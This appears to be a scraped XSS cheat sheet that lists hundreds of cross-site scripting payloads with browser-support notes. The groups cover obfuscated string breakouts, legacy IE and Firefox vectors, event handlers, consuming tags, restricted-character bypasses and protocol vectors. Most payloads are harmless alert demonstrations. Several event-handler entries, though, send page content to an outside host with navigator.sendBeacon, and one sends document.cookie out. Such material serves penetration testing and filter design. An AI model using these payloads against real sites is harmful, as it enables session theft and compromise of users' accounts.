XSS into a JavaScript string: octal escape sequence (self)

chrome,firefox,safari

';this['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (this)

chrome,firefox,safari

';top['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (top)

chrome,firefox,safari

';parent['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (parent)

chrome,firefox,safari

';frames['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (frames)

chrome,firefox,safari

';globalThis['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (globalThis)

chrome,firefox,safari

';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (window)

chrome,firefox,safari

';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (self)

chrome,firefox,safari

';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (this)

chrome,firefox,safari

';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (top)

chrome,firefox,safari

';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (parent)

chrome,firefox,safari

';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (frames)

chrome,firefox,safari

';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (globalThis)

chrome,firefox,safari

';window[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (window)

chrome,firefox,safari

';self[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (self)

chrome,firefox,safari

';this[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (this)

chrome,firefox,safari

';top[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (top)

chrome,firefox,safari

';parent[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (parent)

chrome,firefox,safari

';frames[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (frames)

chrome,firefox,safari

';globalThis[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (globalThis)

chrome,firefox,safari

';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (window)

chrome,firefox,safari

';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (self)

chrome,firefox,safari

';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (this)

chrome,firefox,safari

';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (top)

chrome,firefox,safari

';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)

chrome,firefox,safari

';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)

chrome,firefox,safari

';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)

chrome,firefox,safari

 
Classic vectors
<img src="javascript:alert(1)">
Image src with JavaScript protocol

<body background="javascript:alert(1)">
Body background with JavaScript protocol

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Iframe data urls no longer work as modern browsers use a null origin

<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
VBScript protocol used to work in IE

<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript compact was a minimal version of JS that wasn't widely used in IE

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
JScript.Encode allows encoded JavaScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
VBScript.Encoded allows encoded VBScript

<a title="&{alert(1)}">XSS</a>
JavaScript entities used to work in Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">
JavaScript stylesheets used to be supported by Netscape Navigator

<form><button name=x formaction=x><b>stealme
Button used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
IE9 select elements and plaintext used to consume markup

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
XBL Firefox only <= 2

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
XBL also worked in FF3.5 using data urls

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
CSS expressions <=IE7

<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>
In quirks mode IE allowed you to use = instead of :

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Behaviors for older modes of IE

<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; } </script> </body>
Older versions of IE supported event handlers in functions

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<a href="javascript&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLS after &

firefox

<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULLs inside named entities

firefox

<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Firefox allows NULL characters inside opening comments

firefox

<svg><xss onload=alert(1)>
Safari used to allow any tag to have a onload event inside SVG

safari

<isindex type=image src="//evil?
Isindex using src attribute

<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex using submit

<isindex type=submit formaction=javascript:alert(1)>
Isindex and formaction

<isindex type=submit action=javascript:alert(1)>
Isindex and action

<svg><discard onbegin=alert(1)>
discard tag and onbegin

chrome

<svg><use href="//example.com/use_element/upload.php#x" /></svg>
Use element with an external URL

<img src=validimage.png onloadstart=alert(1)>
onloadstart event for media elements in Firefox v107 and below

firefox

<input type=image onloadend=alert(1) src=validimage.png>
onloadend event for media elements in Firefox v107 and below

firefox

 
Special tags
<meta http-equiv="refresh" content="0; url=//example.com">
Redirect to a different domain

chrome,firefox,safari

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset attribute UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 1

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 2

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 3

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 4

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Upgrade insecure requests

chrome,firefox,safari

<iframe sandbox src="//example.com"></iframe>
Disable JavaScript via iframe sandbox

chrome,firefox,safari

<meta name="referrer" content="no-referrer">
Disable referer

chrome,firefox,safari

 
Other attributes
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc attribute

chrome,firefox,safari

<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Using srcdoc with entities

chrome,firefox,safari

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Click a submit element from anywhere on the page, even outside the form

chrome,firefox,safari

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements

firefox

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements: Access key attributes can enable XSS on normally unexploitable elements

chrome

<a href=# download="filename.html">Test</a>
Download attribute can save a copy of the current webpage

chrome,firefox,safari

<img referrerpolicy="no-referrer" src="//example.com">
Disable referrer using referrerpolicy

chrome,firefox,safari

<a href=# onclick="window.open('http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via parameter on the window.open function

chrome,firefox,safari

<iframe name="alert(1)" src="https://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via name attribute in a <iframe> tag

chrome,firefox,safari

<base target="alert(1)"><a href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in a <base> tag

chrome,firefox,safari

<a target="alert(1)" href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via target attribute in a <a> tag

chrome,firefox,safari

<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via usemap attribute in a <img> tag

chrome,firefox,safari

<form action="http://example.com/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via target attribute in a <form> tag

chrome,firefox,safari

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://example.com/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in a <input> tag type submit

chrome,firefox,safari

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://example.com/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Set window.name via formtarget attribute in a <input> tag type image

chrome,firefox,safari


----

Classic Bypass

OWASP Penetration Testing Kit
 
Event handlers
onafterprint
Fires after the page is printed

<body onafterprint=alert(1)>
onafterscriptexecute
Fires after script is executed

<xss onafterscriptexecute=alert(1)><script>1</script>
onanimationcancel
Fires when a CSS animation cancels

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="print()"></xss>
onanimationend
Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
onanimationiteration
Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
onanimationstart
Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
onauxclick
Fires when right clicking or using the middle button of the mouse

<input onauxclick=alert(1)>
onbeforecopy
Requires you copy a piece of text

<input onbeforecopy=alert(1) value="XSS" autofocus>
onbeforecut
Requires you cut a piece of text

<input onbeforecut=alert(1) value="XSS" autofocus>
onbeforeinput
Fires when the value of the element is about to be modified

<xss contenteditable onbeforeinput=alert(1)>test
onbeforeprint
Fires before the page is printed

<body onbeforeprint=console.log(1)>
onbeforescriptexecute
Fires before script is executed

<xss onbeforescriptexecute=alert(1)><script>1</script>
onbeforetoggle
Fires before the a popop element is toggled

<button popovertarget=x>Click me</button><xss onbeforetoggle=alert(1) popover id=x>XSS</xss>
onbeforeunload
Fires after if the url changes

<body onbeforeunload=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onbegin
Fires when a svg animation begins

<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">
onblur
Fires when an element loses focus

<xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>
onbounce
Fires when the marquee bounces

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
oncanplay
Fires if the resource can be played

<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through

<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onchange
Requires as change of value

<input onchange=alert(1) value=xss>
onclick
Requires a click of the element

<xss onclick="alert(1)" style=display:block>test</xss>
onclose
Fires when a dialog is closed

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu
Triggered when right clicking to show the context menu

<xss oncontextmenu="alert(1)" style=display:block>test</xss>
oncopy
Requires you copy a piece of text

<xss oncopy=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test
oncuechange
Fires when subtitle changes

<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
oncut
Requires you cut a piece of text

<xss oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test
ondblclick
Triggered when double clicking the element

<xss ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</xss>
ondrag
Triggered dragging the element

<xss draggable="true" ondrag="alert(1)" style=display:block>test</xss>
ondragend
Triggered dragging is finished on the element

<xss draggable="true" ondragend="alert(1)" style=display:block>test</xss>
ondragenter
Requires a mouse drag

<xss draggable="true" ondragenter="alert(1)" style=display:block>test</xss>
ondragexit
Triggered when dragging the element

<xss draggable="true" ondragexit="alert(1)" style=display:block>test</xss>
ondragleave
Requires a mouse drag

<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
ondragover
Triggered dragging over an element

<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable style=display:block>drop here</xss>
ondragstart
Requires a mouse drag

<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
ondrop
Triggered dropping a draggable element

<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable style=display:block>drop here</xss>
ondurationchange
Fires when duration changes

<video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onend
Fires when a svg animation ends

<svg><animate onend=alert(1) attributeName=x dur=1s>
onended
Fires when the resource is finished playing

<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onerror
Fires when the resource fails to load or causes an error

<body onerror=alert(1) onload=/>
onfinish
Fires when the marquee finishes

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
onfocus
Fires when the element has focus

<input autofocus onfocus=alert(1)>
onfocusin
Fires when the element has focus

<input autofocus onfocusin=alert(1)>
onfocusout
Fires when an element loses focus

<xss onfocusout=alert(1) autofocus tabindex=1 style=display:block>test</xss><input value=clickme>
onformdata
Triggered when a form is submitted

<form onformdata="alert(1)"><button>Click</button></form>
onfullscreenchange
Fires when a video changes full screen status

<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
onhashchange
Fires if the hash changes

<body onhashchange="print()">
oninput
Requires as change of value

<input oninput=alert(1) value=xss>
oninvalid
Requires a form submission with an element that does not satisfy its constraints such as a required attribute.

<form><input oninvalid=alert(1) required><input type=submit>
onkeydown
Triggered when a key is pressed

<xss onkeydown="alert(1)" contenteditable style=display:block>test</xss>
onkeypress
Triggered when a key is pressed

<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
onkeyup
Triggered when a key is released

<xss onkeyup="alert(1)" contenteditable style=display:block>test</xss>
onload
Fires when the element is loaded

<body onload=alert(1)>
onloadeddata
Fires when the first frame is loaded

<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onloadedmetadata
Fires when the meta data is loaded

<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video>
onloadstart
Triggered video is loaded

<video onloadstart="alert(1)"><source></*>
onmessage
Fires when message event is received from a postMessage call

<body onmessage=print()>
onmousedown
Triggered when the mouse is pressed

<xss onmousedown="alert(1)" style=display:block>test</xss>
onmouseenter
Triggered when the mouse is hovered over the element

<xss onmouseenter="alert(1)" style=display:block>test</xss>
onmouseleave
Triggered when the mouse is moved away from the element

<xss onmouseleave="alert(1)" style=display:block>test</xss>
onmousemove
Requires mouse movement

<xss onmousemove="alert(1)" style=display:block>test</xss>
onmouseout
Triggered when the mouse is moved away from the element

<xss onmouseout="alert(1)" style=display:block>test</xss>
onmouseover
Requires a hover over the element

<xss onmouseover="alert(1)" style=display:block>test</xss>
onmouseup
Triggered when the mouse button is released

<xss onmouseup="alert(1)" style=display:block>test</xss>
onmousewheel
Fires when the mousewheel scrolls

<xss onmousewheel=alert(1) style=display:block>requires scrolling
onmozfullscreenchange
Fires when a video changes full screen status

<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide
Fires when the page is changed

<body onpagehide=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onpageshow
Fires when the page is shown

<body onpageshow=alert(1)>
onpaste
Requires you paste a piece of text

<input onpaste=alert(1) value="" autofocus>
onpause
Requires clicking the element to pause

<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onplay
Fires when the resource is played

<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onplaying
Fires the resource is playing

<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onpointerdown
Fires when the mouse down

<xss onpointerdown=alert(1) style=display:block>XSS</xss>
onpointerenter
Fires when the mouseenter

<xss onpointerenter=alert(1) style=display:block>XSS</xss>
onpointerleave
Fires when the mouseleave

<xss onpointerleave=alert(1) style=display:block>XSS</xss>
onpointermove
Fires when the mouse move

<xss onpointermove=alert(1) style=display:block>XSS</xss>
onpointerout
Fires when the mouse out

<xss onpointerout=alert(1) style=display:block>XSS</xss>
onpointerover
Fires when the mouseover

<xss onpointerover=alert(1) style=display:block>XSS</xss>
onpointerrawupdate
Fires when the pointer changes

<xss onpointerrawupdate=alert(1) style=display:block>XSS</xss>
onpointerup
Fires when the mouse up

<xss onpointerup=alert(1) style=display:block>XSS</xss>
onpopstate
Fires when the history changes

<body onpopstate=print()>
onprogress
Fires when the video/audio begins downloading

<video controls onprogress=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onratechange
Fires when the speed of the video changes

<video controls autoplay onratechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onrepeat
Fires when a svg animation repeats

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onreset
Requires a click

<form onreset=alert(1)><input type=reset>
onresize
Fires when the window is resized

<body onresize="print()">
onscroll
Fires when the page scrolls

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onscrollend
Fires when the scrolling to the end of the element

<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
onsearch
Fires when a form is submitted and the input has a type attribute of search

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked
Requires clicking the element timeline

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking
Requires clicking the element timeline

<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onselect
Requires you select text

<input onselect=alert(1) value="XSS" autofocus>
onselectionchange
Fires when text selection is changed on the page

<body onselectionchange=alert(1)>select some text
onselectstart
Fires when beginning a text selection

<body onselectstart=alert(1)>select some text
onshow
Fires context menu is shown

<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onstart
Fires when the marquee starts

<marquee onstart=alert(1)>XSS</marquee>
onsubmit
Requires a form submission

<form onsubmit=alert(1)><input type=submit>
onsuspend
Fires when the video/audio when the data loading is suspended

<video controls onsuspend=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
ontimeupdate
Fires when the timeline is changed

<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
ontoggle
Fires when the details tag is expanded

<details ontoggle=alert(1) open>test</details>
ontoggle(popover)
Fires when the a popop element is toggled

<button popovertarget=x>Click me</button><xss ontoggle=alert(1) popover id=x>XSS</xss>
ontouchend
Fires when the touch screen, only mobile device

<body ontouchend=alert(1)>
ontouchmove
Fires when the touch screen and move, only mobile device

<body ontouchmove=alert(1)>
ontouchstart
Fires when the touch screen, only mobile device

<body ontouchstart=alert(1)>
ontransitioncancel
Fires when a CSS transition cancels

<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=print()></xss>
ontransitionend
Fires when a CSS transition ends

<xss id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></xss>
ontransitionrun
Fires when a CSS transition begins

<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=print()></xss>
ontransitionstart
Fires when a CSS transition starts

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection
Fires when a promise isn't handled

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload
Fires when the page is unloaded

<svg onunload=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onvolumechange
Requires volume adjustment

<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend
Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
onwebkitanimationiteration
Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
onwebkitanimationstart
Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
onwebkittransitionend
Fires when a CSS transition ends

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
onwheel
Fires when you use the mouse wheel

<body onwheel=alert(1)>
 
Consuming tags
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
Noembed consuming tag

chrome,firefox,safari

<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
Noscript consuming tag

chrome,firefox,safari

<style><img title="</style><img src onerror=alert(1)>"></style>
Style consuming tag

chrome,firefox,safari

<script><img title="</script><img src onerror=alert(1)>"></script>
Script consuming tag

chrome,firefox,safari

<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
iframe consuming tag

chrome,firefox,safari

<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
xmp consuming tag

chrome,firefox,safari

<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
textarea consuming tag

chrome,firefox,safari

<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
noframes consuming tag

chrome,firefox,safari

<title><img title="</title><img src onerror=alert(1)>"></title>
Title consuming tag

chrome,firefox,safari

 
Restricted characters
<script>onerror=alert;throw 1</script>
No parentheses using exception handling

chrome,firefox,safari

<script>{onerror=alert}throw 1</script>
No parentheses using exception handling no semi colons

chrome,firefox,safari

<script>throw onerror=alert,1</script>
No parentheses using exception handling no semi colons using expressions

chrome,firefox,safari

<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses using exception handling and string eval on Chrome / Edge

chrome

<script>throw onerror=eval,'alert\x281\x29'</script>
No parentheses using exception handling and string eval on Safari

safari

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses using exception handling and object eval on Firefox

firefox

<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
No parentheses using exception handling and object eval on Firefox / Safari

firefox,safari

<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>
No parentheses using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>throw{},onerror=Uncaught=eval,h=location.hash,e={lineNumber:1,columnNumber:1,fileName:0,message:h[2]+h[1]+h},!!window.InstallTrigger?e:e.message</script>
No parentheses, no quotes, no spaces using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
No parentheses, no quotes, no spaces, no curly brackets using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval

chrome,firefox,safari

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval without .

chrome,firefox,safari

<script>location='javascript:alert\x281\x29'</script>
No parentheses using location redirect

chrome,firefox,safari

<script>location=name</script>
No parentheses using location redirect no strings

chrome,firefox,safari

<script>alert`1`</script>
No parentheses using template strings

chrome,firefox,safari

<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses using template strings and location hash

chrome,firefox,safari

<script>Function`X${document.location.hash.substr`1`}```</script>
No parentheses or spaces, using template strings and location hash

chrome,firefox,safari

<video><source onerror=location=/\02.rs/+document.cookie>
XSS cookie exfiltration without parentheses, backticks or quotes

chrome,firefox,safari

<svg onload=alert(1)
XSS without greater than

chrome,firefox,safari

<svg onload=alert(1)<!--
XSS without greater using a HTML comment

chrome,firefox,safari

<script>throw[onerror]=[alert],1</script>
Array based destructuring using onerror

chrome,firefox,safari

<script>var{a:onerror}={a:alert};throw 1</script>
Destructuring using onerror

chrome,firefox,safari

<script>var{haha:onerror=alert}=0;throw 1</script>
Destructuring using default values and onerror

chrome,firefox,safari

<script>window.name='javascript:alert(1)';</script><svg onload=location=name>
Vector using window.name

chrome,firefox,safari

<script>window.name='javascript:alert(1)';function blah(){} blah(""+{a:location=name}+"")</script>
Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using object literal

chrome,firefox,safari

<script>window.name='javascript:alert(1)';function blah(){} blah(""+new class b{toString=e=>location=name}+"")</script>
Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using new class

chrome,firefox,safari

 
Protocols
<iframe src="javascript:alert(1)">
Iframe src attribute JavaScript protocol

chrome,firefox,safari

<object data="javascript:alert(1)">
Object data attribute with JavaScript protocol

firefox

<embed src="javascript:alert(1)">
